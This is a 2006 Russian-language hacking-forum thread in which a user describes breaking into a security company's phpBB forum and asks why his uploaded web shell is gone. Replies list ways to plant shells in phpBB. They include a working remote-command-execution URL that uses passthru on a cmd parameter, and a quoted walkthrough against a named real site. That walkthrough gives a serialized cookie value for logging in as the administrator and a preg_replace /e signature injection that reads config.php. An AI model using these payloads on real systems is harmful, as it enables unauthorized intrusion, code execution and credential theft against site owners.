Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Взлом. Способы заливки шелла в phpBB. (https://forum.antichat.xyz/showthread.php?t=20435)

MacTep 12.06.2006 12:24

Взлом. Способы заливки шелла в phpBB.
 
Искал я в гуглике форумы phpBB.. наткнулся на форум компании предоставления программного обеспечения для Защиты Информации. Форум у них phpBB 2.0.3.. Грех не ломануть...

Короче, в админку я пролез секунд через 40, но вот с шеллом запар.. Заливаю, вроде все норм. Запускаю ls -la, там залилась какая-то новая страница pagestart.php, я pwd смотрю дирикторию - папка admin. Захожу на эту левую pagestart, а там надпись что-то типа "Hack attempted".. Но шелла нигде нет...
Что произошло? Где шелл? Просвятите, плз..

qBiN 12.06.2006 12:29

Зачем тебе что-то заливать.google: phpbb <=2.0.10 highlight
выполнение комманд сразу.

k1b0rg 12.06.2006 12:54

мне известно лишь 4 способа залития шелла в phpbb
1) через стили
2) через БД
3) через профайл (любого юзера)
4) через профайл и бд.

все сплойты есть на rst.void.ru
подправишь их, и они будут пахать

MacTep 12.06.2006 13:19

я через стили лез..

lexa 12.06.2006 14:27

Цитата:

Сообщение от qBiN
Зачем тебе что-то заливать.google: phpbb <=2.0.10 highlight
выполнение комманд сразу.

после этого уже не разговор ! просто проделай как посоветовали !

MacTep 12.06.2006 18:30

Цитата:

Сообщение от qBiN
Зачем тебе что-то заливать.google: phpbb <=2.0.10 highlight
выполнение комманд сразу.

Я сильно туплю, но чем его запускать? скачал компиль php, не фурычит..

Tem 12.06.2006 18:54

Вроде же эксплоит написан в пёрле а не на пхп, зачем тебе компил пхп? лутши актив пёрл скачай, установи, потом комндную строку.

k1b0rg 12.06.2006 19:11

мда, это ж каким терпением и выдержкой надо обладать чтобы модерить в разделе форумов. кошмар, слава всевышнему, что меня сняли.

компилы php,perl
мда.
Народ вы бы хотя бы думали о чом пишете, а то услышал звон хз где он.

вот сплойт
http://site.ru/forum/viewtopic.php?t=7&cmd=ls&highlight='.passthru($HTT P_GET_VARS[cmd]).'


если ты спросишь, как его скомпилить, минусами закидаю

MacTep 12.06.2006 20:44

Сорри, я просто нашел какую-то ботву на php.. вопросов больше не имею..

Ch3ck 12.06.2006 21:55

Вот вырезка из Хакера(87), прочитай, может поможет...
http://www.systemfond.ru/forum/viewt...ighlight=%2527

Ничего не получается, форум не выдает никакой ошибки, значит, будем использовать более новую уязвимость всех версий форума phpBB<=2.0.17 — связки php-функции preg_replace() и переменной signature_bbcode_uid (м-да, с регулярными выражениями у авторов phpBB беда, учите паттерны!). Итак, пробуем регистрироваться… Неудача! Активация пользователей на форуме осуществляется самими администраторами. Вспоминаем про еще одну уязвимость форума — возможность входа под любым пользователем через багу в кукисах. Нам нужен аккаунт админа, значит, идем в браузер Опера, в меню Сервис->Дополнительно->Управление cookies (если ты сидишь не в Опере, то поищи на nsd.ru (или на www.xakep.ru) проги для редактирования оных), ищем там www.systemfond.ru, удаляем содержимое переменной iconboard_sid (да-да, так админы назвали кукисы, думали, что это чем-то поможет, наивные), а в iconboard_data вставляем следующее значение:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Поясню, с помощью этой строки мы залогинимся под пользователем с id=2, так как в скрипте, отвечающем за вход, недостаточно проверяется соответствие типов переменных. Если вдруг тебе понадобится другой пользователь, то ты легко можешь вставить любой id в это значение здесь: 3A%22[id]%22%3B%7D

[берем от админа все]

Перезагружаем страницу (так, чтобы в ее параметрах не было sid, так как с любым существующим значением sid ничего не получится), в итоге оказываемся залогиненными под администратором [ Kudesnik ]. Итак, идем в редактирование профиля нашего админа :). Сохраняем страницу себе на хард, в html-коде находим

<form action="profile.php" method="post">

и меняем на

<form action=www.systemfond.ru/forum/profile.php?signature_bbcode_uid=(.*)/e%00 method="post">

Загружаем полученную страницу и в поле подписи вставляем

[b:file_get_contents($_GET[bb])

В это место можно, естественно, вставить любой php-код, в том числе и system() -после "[b:". Но сейчас нам нужна именно функция получения содержимого файла. Нажимаем «Отправить» и идем по ссылке http://www.systemfond.ru/forum/profi...&bb=config.php. В поле подписи нам открылось содержание config.php,


Время: 11:24